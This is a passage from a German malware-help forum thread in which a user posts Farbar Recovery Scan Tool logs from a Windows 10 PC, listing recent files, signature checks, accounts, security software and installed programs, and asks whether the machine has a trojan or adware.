- 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys 2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc 2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24 2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8 2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1 2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung 2017-05-07 
17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities 2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive 2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft 2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek 2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel 2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared 2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared 2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep 2017-05-07 16:46 - 2017-03-20 07:06 - 00000000 ___HD C:\$WINDOWS.~BT 2017-05-01 12:46 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2 2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD 2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT 2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache 2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam 2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb 2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb 2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap 2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap 2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D 
C:\Users\Dino\AppData\Local\JDownloader v2.0

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
2017-05-19 14:19 - 2014-01-23 08:04 - 0178760 _____ (Microsoft Corporation) C:\Users\Dino\AppData\Local\Temp\ose00000.exe
2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-07 17:13

==================== Ende von FRST.txt ============================ |
19.05.2017, 14:31 | #2 |
| Trojan, adware or something else? Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 14-05-2017
durchgeführt von Dino (19-05-2017 14:42:22)
Gestartet von D:\Dino\Downloads
Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled)
Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino
Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Spybot - Search and Destroy (Disabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.)
Hidden Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH) Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated) AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.) AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.) ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft) ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft) Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version: - Ubisoft) ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.) ASUS GPU Tweak (x32 Version: 2.8.2.0 - ASUSTek COMPUTER INC.) Hidden Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Besiege (HKLM-x32\...\Steam App 346010) (Version: - Spiderling Studios) Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender) Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender) Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.) Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.) Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.) Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.) Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version: - *Canon Inc.) Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.) 
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.) Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) 
Hidden Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive) CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World) Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.) Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version: - ) ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen) EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc) Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version: - Ubisoft) Ghostery (HKLM-x32\...\Ghostery) (Version: - Ghostery Inc) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.) Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation) JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH) Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - 
Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft) Mozilla 
Firefox 53.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.2 (x86 de)) (Version: 53.0.2 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.2.6333 - Mozilla) Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.) Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek) Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.) Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.) Sacred 3 (HKLM-x32\...\Steam App 247950) (Version: - Keen Games) Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics) Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.) Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung) SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts) Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.) 
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Hidden Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB) Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.) StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version: - Ubisoft) Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb) Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft) Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.) Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment) Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation) WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH) WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH) WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
